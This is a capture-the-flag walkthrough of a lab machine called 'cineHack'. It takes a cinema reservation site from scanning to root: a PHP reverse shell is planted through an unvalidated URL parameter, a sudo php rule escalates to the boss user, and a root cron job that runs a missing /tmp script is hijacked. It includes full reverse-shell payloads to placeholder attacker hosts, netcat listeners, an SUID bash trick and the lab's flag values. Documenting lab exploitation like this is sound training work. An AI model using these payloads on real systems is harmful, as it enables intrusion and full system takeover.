cineHack
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
PORT STATE SERVICE
80/tcp open http
Hostname Discovery
The website's title, "Bienvenidos a Cinema DL," suggested a potential hostname of cinema.dl
. This was confirmed and added to the local /etc/hosts
file for convenient access.
echo "$TARGET_IP cinema.dl" | sudo tee -a /etc/hosts
Vulnerability Analysis
Feature Exploration: Reservation System
The Cinema DL website features a movie reservation system. The reservation process involves a form that submits user data to the server via an HTTP POST request to /reservation.php
.
Request Interception and Analysis
The HTTP request generated by the reservation form was intercepted and analyzed using Burp Suite.
Captured Request (Decoded):
POST /reservation.php HTTP/1.1
Host: cinema.dl
Content-Length: 136
[... other headers omitted for brevity ...]
name=Juan Pérez&email=juanperez@example.com&phone=+34 600 123 456&problem_url=http://tusitio.com/uploads/webshell.php
Suspected Vulnerability: Unvalidated problem_url
Parameter
The problem_url
parameter immediately stood out. It accepted a URL as input, raising concerns about potential vulnerabilities stemming from insufficient input validation. The following vulnerabilities were hypothesized:
- Remote File Inclusion (RFI): The application might attempt to include and execute a file from the provided URL.
- Server-Side Request Forgery (SSRF): The server could be tricked into making requests to arbitrary URLs on its behalf.
- Arbitrary File Upload: The URL might be used as a file upload path, allowing malicious file uploads to the server.
Exploitation: Confirming and Leveraging the Vulnerability
Hypothesis: Arbitrary File Upload
Based on the structure of the request, it was suspected that the problem_url
parameter could be exploited for arbitrary file uploads, potentially leading to remote code execution.
Payload Design: PHP Reverse Shell
To test the hypothesis, a simple PHP reverse shell was crafted:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/YOUR_ATTACKER_PORT 0>&1'");
?>
Explanation: This script, when executed on the server, establishes a reverse shell connection back to the attacker's machine (replace YOUR_ATTACKER_IP
and YOUR_ATTACKER_PORT
accordingly). It redirects standard input, output, and error streams to a TCP socket, granting interactive shell access.
Test Environment Setup
-
Web Server: A temporary web server was started using Python to host the reverse shell payload (
webshell.php
).# Ensure the directory /uploads/ exists before running
python3 -m http.server 8000 -
Netcat Listener: A netcat listener was set up on the attacker's machine to receive the reverse shell connection.
rlwrap nc -lvnp YOUR_ATTACKER_PORT
rlwrap
stands for "Readline Wrapper." It's a utility that acts as a "wrapper" around other commands, providing them with the powerful features of the GNU Readline library. The Readline library is what gives many interactive programs (like your regular Bash shell) their advanced line-editing and history capabilities.
Directory Enumeration: A Twist
Initial attempts to locate a standard /uploads
directory were unfruitful. Drawing inspiration from similar scenarios, it was hypothesized that the target directory's name might be related to the actors in the movie featured on the reservation page, "El tiempo que tenemos."
Directory Discovery Strategy:
-
Actor Name Research: A list of actors from the movie "El tiempo que tenemos" was compiled.
-
Wordlist Generation: The actor names were formatted into a wordlist for automated directory brute-forcing. This list included names like "florencepugh," "gracedelaney," and "andrewgarfield."
-
Automated Brute-Forcing: The
gobuster
tool was used with the custom wordlist to scan for potential directories.gobuster dir -u http://cinema.dl -w actor_dirs.txt
Successful Discovery:
/andrewgarfield (Status: 301) [Size: 315] [--> http://cinema.dl/andrewgarfield/]
This revealed a non-standard directory named /andrewgarfield
, likely writable and accessible.
Triggering the Exploit
-
Modified Request: The
problem_url
parameter in the intercepted POST request to/reservation.php
was modified to point to the hostedwebshell.php
on the attacker's server:http://cinema.dl/reservation.php?problem_url=http://10.0.2.15:8000/uploads/webshell.php
-
Server Response: The attacker's web server logs confirmed that the target server requested the
webshell.php
file:Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.17.0.2 - - [21/Jan/2025 06:37:42] "GET /uploads/webshell.php HTTP/1.1" 200 - -
Verification: Accessing
http://cinema.dl/andrewgarfield/webshell.php
in a browser triggered the reverse shell. The netcat listener on the attacker's machine received a connection, confirming successful remote code execution.
Privilege Escalation
The initial foothold provided limited access as the www-data
user. To elevate privileges, we explored the system for potential escalation vectors.
Identifying Sudo Permissions
We began by listing the commands that www-data
could execute with elevated privileges using sudo
:
sudo -l
Output:
Matching Defaults entries for www-data on dockerlabs:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User www-data may run the following commands on dockerlabs:
(boss) NOPASSWD: /bin/php
Interpretation:
The output reveals that www-data
can execute /bin/php
as the user boss
without requiring a password. This presents a potential avenue for privilege escalation to the boss
user.
Escalating to 'boss' User
Leveraging the identified sudo
permission, we executed a PHP command to spawn a shell as the boss
user:
sudo -u boss /bin/php -r 'system("/bin/bash");'
Explanation:
sudo -u boss
: Executes the command as theboss
user./bin/php
: The allowed binary.-r 'system("/bin/bash");'
: Executes a single line of PHP code that uses thesystem()
function to spawn a Bash shell.
We then verified our escalated privileges and captured the user flag:
whoami
cd /home/boss
cat user.txt # 93a85c1e99d62afe15c179d4fd005f40 (user flag)
Analyzing Scheduled Tasks (Cron Jobs)
To further escalate privileges to root
, we investigated scheduled tasks running with root privileges. Cron jobs are a common target for privilege escalation, as they often execute scripts with elevated permissions.
We inspected the root user's crontab:
cat /var/spool/cron/crontabs/root
Output:
#!/bin/bash
# ... (comments omitted for brevity) ...
# m h dom mon dow command
#*/1 * * * * chmod +r /var/spool/cron/crontabs/root
/opt/update.sh
/tmp/script.sh
Interpretation:
- The crontab executes two scripts every minute:
/opt/update.sh
and/tmp/script.sh
.
Investigating /opt/update.sh
We examined the contents of /opt/update.sh
:
cat /opt/update.sh
Output:
#!/bin/bash
# Comprobar si el usuario 'boss' tiene algún proceso en ejecución
# También buscar procesos asociados a "script" o shells indirectas
if pgrep -u boss > /dev/null; then
# Mostrar procesos activos del usuario boss para depuración (opcional)
echo "Procesos activos del usuario boss:"
ps -u boss
# Matar todos los procesos del usuario 'boss' incluyendo 'script'
pkill -u boss
pkill -9 -f "script"
# Confirmar que los procesos fueron terminados
if pgrep -u boss > /dev/null; then
echo "No se pudieron terminar todos los procesos del usuario boss."
else
echo "El usuario boss ha sido desconectado por seguridad."
fi
else
echo "El usuario boss no está conectado."
fi
Analysis:
- This script checks if the
boss
user has any running processes. - If
boss
has active processes, it terminates them usingpkill
. - It also attempts to forcefully kill any process containing the string "script" in its command line using
pkill -9 -f "script"
. - It is designed to log the user out for security reasons if it is found logged in.
Identifying the Missing Script: /tmp/script.sh
We attempted to view the contents of /tmp/script.sh
, but it was not found:
ls -l /tmp/script.sh
# Output: ls: cannot access '/tmp/script.sh': No such file or directory
Observation:
The absence of /tmp/script.sh
is significant. Since this script is executed by the root crontab every minute, creating it with our own malicious code could lead to code execution as root.
Verifying Cron Job Execution
We monitored the processes related to the root crontab to confirm its execution:
ps aux | grep /var/spool/cron/crontabs/
Output (Sample):
root 1 0.0 0.0 2800 1588 ? Ss 10:54 0:00 /bin/sh -c service apache2 start && service cron start && while true; do /var/spool/cron/crontabs/root.sh; sleep 60; done
boss 1376 0.0 0.0 3528 1760 ? S 13:38 0:00 grep /var/spool/cron/crontabs/
Confirmation:
The output shows a process running /var/spool/cron/crontabs/root.sh
within a loop, confirming that the cron job is active and executing every 60 seconds.
Exploiting the Missing Script for Root Privilege Escalation
Since /tmp/script.sh
is executed by root every minute, and we can create it, we can insert a payload to gain root privileges.
Payload Creation: Alternative 1
We created /tmp/script.sh
with the following content:
echo '#!/bin/bash
/bin/bash -p > /dev/tcp/YOUR_ATTACKER_IP/YOUR_ATTACKER_PORT 0>&1' > /tmp/script.sh && chmod +x /tmp/script.sh
rlwrap nc -lvnp YOUR_ATTACKER_PORT
A netcat listener was set up on the attacker's machine to receive the reverse shell connection. Within a minute, the cron job executed our malicious script, and the netcat listener received a connection from the target machine, providing a root shell.
Explanation:
echo '#!/bin/bash ... 0>&1'
: This part creates the script content.#!/bin/bash
: The shebang to indicate it's a Bash script./bin/bash -p > /dev/tcp/YOUR_ATTACKER_IP/YOUR_ATTACKER_PORT 0>&1
: The reverse shell payload. Remember to replaceYOUR_ATTACKER_IP
andYOUR_ATTACKER_PORT
with your actual attacker IP and port.
> /tmp/script.sh
: This redirects the output ofecho
to create the file/tmp/script.sh
.&&
: This is a command chaining operator. It executes the command on the right-hand side only if the command on the left-hand side was successful.chmod +x /tmp/script.sh
: This makes the newly created script executable.
Payload Creation: Alternative 2
Instead of creating a reverse shell, we can leverage the cron job to directly elevate the privileges of our current boss user session to root. This is a more efficient and often preferred approach in this scenario.
echo '#!/bin/bash
chmod +s /bin/bash' > /tmp/script.sh && chmod +x /tmp/script.sh
Explanation:
chmod +s /bin/bash
: This command sets the SUID (Set User ID) bit on the/bin/bash
executable.- SUID Bit: When the SUID bit is set on an executable file, it allows that file to be executed with the privileges of the file's owner (in this case,
root
, as/bin/bash
is typically owned by root) regardless of who runs the file.
- SUID Bit: When the SUID bit is set on an executable file, it allows that file to be executed with the privileges of the file's owner (in this case,
How it Works:
- The cron job, running as
root
, executes/tmp/script.sh
. - Our script sets the SUID bit on
/bin/bash
. - Now, any user, including
boss
, can execute/bin/bash
and will effectively have root privileges because of the SUID bit.
Execute bash -p
to gain a root shell. The -p
option is important here; it ensures that Bash retains the effective UID from the SUID bit, giving you root privileges.
bash -p
whoami # root
id # uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Capturing the Root Flag
With root privileges, we could now access and retrieve the root flag:
cat /root/root.txt # 687f891cbfd513ac53641755ce0efe5e